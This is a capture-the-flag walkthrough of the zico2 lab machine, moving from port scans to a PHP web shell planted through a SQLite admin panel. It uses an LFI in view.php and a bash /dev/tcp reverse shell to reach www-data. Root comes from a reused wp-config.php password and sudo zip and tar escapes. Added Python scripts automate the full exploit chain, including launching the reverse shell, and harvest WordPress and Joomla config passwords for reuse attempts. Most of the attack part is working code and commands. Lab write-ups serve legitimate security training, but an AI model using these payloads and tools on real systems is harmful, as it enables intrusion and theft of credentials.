Machine Information
- Name: zico2
- Author: Rafael
Host discovery
- Target IP: 10.10.10.133
Information Gathering
Nmap time
nmap -p- -T4 10.10.10.133 -A -oA 10.10.10.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 14:20 +08
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:10 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.82% done; ETC: 14:20 (0:00:04 remaining)
Nmap scan report for 10.10.10.133
Host is up (0.00078s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37548/udp status
| 100024 1 41180/udp6 status
| 100024 1 45184/tcp6 status
|_ 100024 1 49982/tcp status
49982/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:6C:3F:67 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms 10.10.10.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds
Exploiting Port 80
Of the four open ports, the web server is the only real attack surface (SSH and the rpcbind/status services just confirm an old Ubuntu build), so I started out by wandering around the website.
The site looks like plain static content with nothing much to work on, so the next step is directory brute-forcing:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.133/ -x php,js,txt,bak,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.133/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,bak,zip,php,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 284]
/.hta.php (Status: 403) [Size: 288]
/.hta.js (Status: 403) [Size: 287]
/.hta.bak (Status: 403) [Size: 288]
/.hta.zip (Status: 403) [Size: 288]
/.hta.txt (Status: 403) [Size: 288]
/.htaccess.zip (Status: 403) [Size: 293]
/.htaccess (Status: 403) [Size: 289]
/.htaccess.js (Status: 403) [Size: 292]
/.htaccess.txt (Status: 403) [Size: 293]
/.htpasswd (Status: 403) [Size: 289]
/.htpasswd.bak (Status: 403) [Size: 293]
/.htpasswd.txt (Status: 403) [Size: 293]
/.htaccess.php (Status: 403) [Size: 293]
/.htpasswd.zip (Status: 403) [Size: 293]
/.htaccess.bak (Status: 403) [Size: 293]
/.htpasswd.php (Status: 403) [Size: 293]
/.htpasswd.js (Status: 403) [Size: 292]
/cgi-bin/ (Status: 403) [Size: 288]
/css (Status: 301) [Size: 310] [--> http://10.10.10.133/css/]
/dbadmin (Status: 301) [Size: 314] [--> http://10.10.10.133/dbadmin/]
/img (Status: 301) [Size: 310] [--> http://10.10.10.133/img/]
/index (Status: 200) [Size: 7970]
/index.html (Status: 200) [Size: 7970]
/js (Status: 301) [Size: 309] [--> http://10.10.10.133/js/]
/LICENSE (Status: 200) [Size: 1094]
/package (Status: 200) [Size: 789]
/server-status (Status: 403) [Size: 293]
/tools (Status: 200) [Size: 8355]
/vendor (Status: 301) [Size: 313] [--> http://10.10.10.133/vendor/]
/view.php (Status: 200) [Size: 0]
/view (Status: 200) [Size: 0]
There are some interesting paths here: /dbadmin, /tools, /package, /LICENSE and view.php. I looked into them one by one.
I found a login page at /dbadmin/test_db.php. Since the version number is shown on the page, I searched for known exploits and default credentials and found a published exploit that describes the attack in detail and also gives the default password, which is admin.
With the default password I was into the admin panel, and from there I could just follow the exploit to get RCE. The panel writes each database it manages to a file on disk, so the first step is to create a new database whose name ends in .php.
Next, create a table with any name and put the PHP code in a column's default value. The default value has to be a small web shell that runs whatever is passed in a request parameter; the curl request further down uses parameter 0 for the command, so something like <?php system($_GET[0]); ?> is what ends up in the file.
The .php file now exists on disk, but something still has to include it so that PHP executes it. Looking at the main page again, I noticed a link that goes through view.php, with the target passed in a page parameter.
That looks like a candidate for local file inclusion, so I tried pulling /etc/passwd through it with a ../ traversal, which worked.
With the include confirmed, I pointed it at the database file I had just created and passed a command in parameter 0:
curl 'http://10.10.10.133/view.php?page=../../../../../../../usr/databases/test.php&0=id' --output -
��yQ�table11CREATE TABLE '1' ('test' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data)
The garbage at the start is the SQLite file header and schema record being echoed back as plain text: include() only executes the <?php ... ?> span, so the output of id appears exactly where the default value used to be inside the CREATE TABLE statement. That is command execution as www-data, so the next step is a reverse shell back to a netcat listener.
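The whole chain above, reproduced as an added example that is not part of the original writeup. The sqlite3 part does offline what the admin panel did on the box (a database file named .php whose schema text carries a PHP tag) and checks that the tag survives byte-for-byte; the rest builds the same view.php requests the writeup uses. Assumptions, all taken from the requests and listener output shown on this page rather than confirmed against the panel: the database landed at /usr/databases/test.php, seven ../ segments reach the filesystem root, the web shell is <?php system($_GET[0]); ?>, the listener is 10.10.10.128:7735, and the reverse shell is a bash /dev/tcp one-liner (my choice; the writeup does not show its payload).

```python
# Added example, not from the original writeup. Reproduces the "SQLite
# database named .php + LFI" chain: build the file locally with sqlite3 to
# see why it works, then construct the view.php requests used on the box.
# Assumptions: DB path /usr/databases/test.php (from the writeup's curl),
# web shell <?php system($_GET[0]); ?>, listener 10.10.10.128:7735.
import os
import sqlite3
import tempfile
from urllib.parse import quote
from urllib.request import urlopen

PHP_PAYLOAD = "<?php system($_GET[0]); ?>"
TARGET = "http://10.10.10.133"
DB_PATH = "usr/databases/test.php"  # the traversal prefix supplies the leading /


def build_payload_db(path: str) -> bytes:
    """Do locally what the admin panel did: create a SQLite file whose name
    ends in .php and give a column a default value holding PHP. SQLite keeps
    the CREATE TABLE text verbatim in its schema table, so the tag lands in
    the file as plain text surrounded by binary page data."""
    con = sqlite3.connect(path)
    con.execute(f"CREATE TABLE t1 (test TEXT DEFAULT '{PHP_PAYLOAD}')")
    con.commit()
    con.close()
    with open(path, "rb") as fh:
        return fh.read()


def payload_intact(db_bytes: bytes) -> bool:
    """PHP's include() executes only the <?php ... ?> spans of a file and
    echoes everything else, so the tag has to survive unmodified."""
    return db_bytes.startswith(b"SQLite format 3\x00") and PHP_PAYLOAD.encode() in db_bytes


def demo_payload_survives() -> bool:
    """Create the .php database in a temp dir and report whether the tag is in it."""
    with tempfile.TemporaryDirectory() as d:
        return payload_intact(build_payload_db(os.path.join(d, "test.php")))


def lfi_url(cmd: str, depth: int = 7, base: str = TARGET, path: str = DB_PATH) -> str:
    """view.php?page=<traversal><file>&0=<cmd>: page is the include target,
    parameter 0 is what system() runs. Only the command is URL-encoded."""
    return f"{base}/view.php?page={'../' * depth}{path}&0={quote(cmd, safe='')}"


def extract_output(body: bytes) -> str:
    """The response is the raw SQLite file with the tag replaced by the
    command output, so the output sits where the DEFAULT value used to be:
    ... default 'uid=33(www-data) ...'). Pull out that quoted span."""
    text = body.decode("latin-1")
    marker = "default '"
    i = text.lower().find(marker)
    if i < 0:
        return ""
    start = i + len(marker)
    end = text.find("'", start)
    return text[start:end if end >= 0 else None].strip()


def reverse_shell_cmd(lhost: str = "10.10.10.128", lport: int = 7735) -> str:
    """Bash reverse shell to send through parameter 0 (assumes bash exists on
    the target, which it does on Ubuntu even though /bin/sh is dash)."""
    return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


if __name__ == "__main__":
    # 1. file-level check: the tag survives inside the SQLite container
    print("payload survives in .php database:", demo_payload_survives())
    # 2. against the lab VM only: run id, then fire the shell.
    #    Start `nc -nvlp 7735` on 10.10.10.128 before the last request.
    with urlopen(lfi_url("id"), timeout=10) as r:
        print(extract_output(r.read()))
    try:
        urlopen(lfi_url(reverse_shell_cmd()), timeout=5)
    except Exception:
        pass  # the request never completes while the shell is connected; expected
```

The reverse-shell request deliberately swallows its timeout: system() blocks for as long as the shell lives, so the HTTP response never arrives and the interesting part happens on the listener.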
nc -nvlp 7735
listening on [any] 7735 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.133] 59963
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@zico:/var/www$ export TERM=xterm
export TERM=xterm
www-data@zico:/var/www$ ^Z
zsh: suspended nc -nvlp 7735
Privilege Escalation
Now that I have a shell, it's time for privilege escalation. I looked at the home directory first.
www-data@zico:/home/zico$ ls -la
total 9244
drwxr-xr-x 6 zico zico 4096 Jun 19 2017 .
drwxr-xr-x 3 root root 4096 Jun 8 2017 ..
-rw------- 1 zico zico 912 Jun 19 2017 .bash_history
-rw-r--r-- 1 zico zico 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 zico zico 3486 Jun 8 2017 .bashrc
-rw-r--r-- 1 zico zico 675 Jun 8 2017 .profile
drw------- 2 zico zico 4096 Jun 8 2017 .ssh
-rw------- 1 zico zico 3509 Jun 19 2017 .viminfo
-rw-rw-r-- 1 zico zico 504646 Jun 14 2017 bootstrap.zip
drwxrwxr-x 18 zico zico 4096 Jun 19 2017 joomla
drwxrwxr-x 6 zico zico 4096 Aug 19 2016 startbootstrap-business-casual-gh-pages
-rw-rw-r-- 1 zico zico 61 Jun 19 2017 to_do.txt
drwxr-xr-x 5 zico zico 4096 Jun 19 2017 wordpress
-rw-rw-r-- 1 zico zico 8901913 Jun 19 2017 wordpress-4.8.zip
-rw-rw-r-- 1 zico zico 1194 Jun 8 2017 zico-history.tar.gz
Since there's a zico-history.tar.gz, I copied it to /tmp, extracted it and had a look.
www-data@zico:/tmp/zico-history$ cat zico-history.txt
https://en.wikipedia.org/wiki/Zico
Arthur Antunes Coimbra, born 3 March 1953 in Rio de Janeiro), better know Zico, is a Brazilian coach and former footballer, who played as an attacking midfielder. Often called the "White Pelé", he was a creative playmaker, with excellent technical skills, vision, and en eye for goal, who is considered one of the most clinical finishers and best passers ever, as well as one of the greatest players of all time.[2][3][4] Arguably the world's best player of the late 1970s and early 80s, he is regarded as one of the best playmakers and free kick specialists in history, able to bend the ball in all directions.[5] In 1999, Zico came eighth in the FIFA Player of the Century grand jury vote, and in 2004 was named in the FIFA 100 list of the world's greatest living players.[6][7] According to Pelé, generally considered the best player ever, "throughout the years, the one player that came closest to me was Zico".[8]
With 48 goals in 71 official appearances for Brazil, Zico is fifth highest goalscorer for his national team.[9] He represented them in the 1978, 1982 and 1986 World Cups. They did not win any of those tournaments, even though the 1982 squad is considered one of the greatest Brazilian national squads ever.[10] Zico is often considered one of the best players in football history not to have been on a World Cup winning squad. He was chosen 1981[11] and 1983 Player of the Year.
Zico has coached the Japanese national team, appearing in the 2006 FIFA World Cup and winning the Asian Cup 2004, and Fenerbahçe, who were a quarter-finalist in 200 in the Champions League under his command. He was announced as the head coach of CSKA Moscow in January 2009. On 16 September 2009, Zico was signed by Greek side Olympiacos for a two-year contract after the club's previous coach, Temuri Ketsbaia, was sacked. He was fired four months later, on 19 January 2010.[
Nothing useful there, so I went back to the home directory and searched for configuration files: the WordPress and Joomla installs sitting there are likely to carry database credentials.
www-data@zico:/home/zico$ find . -name "*config*" 2>/dev/null
./wordpress/wp-config.php
./wordpress/wp-content/plugins/akismet/views/config.php
./wordpress/wp-admin/setup-config.php
./joomla/components/com_config
./joomla/components/com_config/config.php
./joomla/components/com_config/view/config
./joomla/components/com_config/controller/config
./joomla/components/com_config/model/config.php
./joomla/components/com_config/model/form/config.xml
./joomla/language/en-GB/en-GB.com_config.ini
./joomla/administrator/components/com_config
./joomla/administrator/components/com_config/config.php
./joomla/administrator/components/com_config/config.xml
./joomla/administrator/components/com_config/helper/config.php
./joomla/administrator/components/com_redirect/config.xml
./joomla/administrator/components/com_media/config.xml
./joomla/administrator/components/com_newsfeeds/config.xml
./joomla/administrator/components/com_admin/views/sysinfo/tmpl/default_config.php
./joomla/administrator/components/com_templates/config.xml
./joomla/administrator/components/com_contact/config.xml
./joomla/administrator/components/com_installer/config.xml
./joomla/administrator/components/com_joomlaupdate/config.xml
./joomla/administrator/components/com_checkin/config.xml
./joomla/administrator/components/com_tags/config.xml
./joomla/administrator/components/com_plugins/config.xml
./joomla/administrator/components/com_modules/config.xml
./joomla/administrator/components/com_postinstall/config.xml
./joomla/administrator/components/com_finder/config.xml
./joomla/administrator/components/com_menus/config.xml
./joomla/administrator/components/com_content/config.xml
./joomla/administrator/components/com_banners/config.xml
./joomla/administrator/components/com_users/config.xml
./joomla/administrator/components/com_cache/config.xml
./joomla/administrator/components/com_messages/views/config
./joomla/administrator/components/com_messages/config.xml
./joomla/administrator/components/com_messages/controllers/config.php
./joomla/administrator/components/com_messages/models/config.php
./joomla/administrator/components/com_messages/models/forms/config.xml
./joomla/administrator/components/com_search/config.xml
./joomla/administrator/components/com_languages/config.xml
./joomla/administrator/language/en-GB/en-GB.com_config.sys.ini
./joomla/administrator/language/en-GB/en-GB.com_config.ini
./joomla/administrator/templates/hathor/html/com_config
./joomla/administrator/templates/hathor/html/com_admin/sysinfo/default_config.php
./joomla/administrator/templates/hathor/images/header/icon-48-config.png
./joomla/administrator/templates/hathor/images/menu/icon-16-config.png
./joomla/administrator/templates/hathor/images/toolbar/icon-32-config.png
./joomla/installation/configuration.php-dist
./joomla/installation/controller/install/config.php
./joomla/installation/model/configuration.php
./joomla/web.config.txt
./joomla/libraries/cms/component/router/viewconfiguration.php
./joomla/libraries/fof/utils/config
./joomla/libraries/fof/config
That's a lot of config files. Most of the Joomla hits are component XML, so I went through the obvious ones for credentials, starting with WordPress's wp-config.php.
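Going through config files one by one is fine for two installs, but it is worth having a small harvester for the two formats that show up here. The following is an added example, not part of the original writeup: it knows the WordPress wp-config.php define() style and the Joomla configuration.php "public $x" style, pairs each username with the passwords from the same file, and runs on constructed samples with made-up values (not the box's real credentials) so it works offline.

```python
# Added example, not from the original writeup: harvest credential-looking
# settings from WordPress and Joomla config files and pair users with
# passwords for reuse attempts against local accounts (su / ssh).
import re
from typing import Dict, List, Tuple

# WordPress: define('DB_PASSWORD', '...');
WP_DEFINE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")
# Joomla: public $password = '...';
JOOMLA_PROP = re.compile(r"""public\s+\$(user|password|db|host|secret|ftp_pass)\s*=\s*['"]([^'"]*)['"]""")

USER_KEYS = {"DB_USER", "user"}
PASSWORD_KEYS = {"DB_PASSWORD", "password", "ftp_pass"}
INTERESTING = USER_KEYS | PASSWORD_KEYS | {"DB_NAME", "DB_HOST", "db", "host", "secret"}


def harvest(name: str, text: str) -> List[Tuple[str, str, str]]:
    """Return (file, key, value) triples for credential-looking settings in one file."""
    found = []
    for pat in (WP_DEFINE, JOOMLA_PROP):
        for key, value in pat.findall(text):
            if key in INTERESTING:
                found.append((name, key, value))
    return found


def reuse_candidates(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Pair every user-ish value with every non-empty password-ish value from
    the same file. On this box the database password was also zico's login
    password, which is exactly the reuse these pairs are meant to catch."""
    pairs = []
    for name, text in files.items():
        entries = harvest(name, text)
        users = [v for _, k, v in entries if k in USER_KEYS]
        pwds = [v for _, k, v in entries if k in PASSWORD_KEYS and v]
        pairs.extend((u, p) for u in users for p in pwds)
    return pairs


# Constructed samples in the two formats; the values are made up.
SAMPLES = {
    "wordpress/wp-config.php": """<?php
define('DB_NAME', 'blog');
define('DB_USER', 'blog');
define('DB_PASSWORD', 'Example-Wp-Pass-1');
define('DB_HOST', 'localhost');
define('AUTH_KEY', 'not a login credential');
""",
    "joomla/configuration.php": """<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'jadmin';
    public $password = 'Example-Joomla-Pass-2';
    public $db = 'joomla';
    public $secret = 'abc123';
}
""",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        for f, k, v in harvest(name, text):
            print(f"{f}: {k} = {v}")
    print("try against local users with su/ssh:", reuse_candidates(SAMPLES))
```

On a real box, feed it the files from the find output (wp-config.php and, if the Joomla install is configured, configuration.php); the AUTH_KEY/secret style values are deliberately not treated as passwords since they are salts, not logins.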
www-data@zico:/home/zico/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
That gives a database username and password. Trying the same password for the local user zico works, a plain case of password reuse:
www-data@zico:/home/zico/wordpress$ su zico
Password:
zico@zico:~/wordpress$ whoami
zico
Now that I have zico's password, I checked what sudo allows:
zico@zico:~/wordpress$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
Both tar and zip can be run as root without a password, and both have GTFOBins entries. I used the zip one:
zico@zico:~/wordpress$ TF=$(mktemp -u)
zico@zico:~/wordpress$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 35%)
# whoami
root
root@zico:/root# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
That is the GTFOBins command verbatim and it gives a root shell. It works because -T tells zip to test the archive after writing it and -TT replaces the test command with whatever string follows, so 'sh #' runs under sudo as root; the trailing # comments out the archive name zip appends to the command. The tar entry from sudo -l gives an equivalent path through its checkpoint hook: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh.
Things I learned from the machine
- An unusual initial foothold: a database admin panel that writes a .php-named database file to disk, chained with an LFI in view.php to execute the PHP hidden in it.
- Weak and reused passwords do most of the work: a default admin password on the panel, and a database password in wp-config.php that is also the password of the system user zico.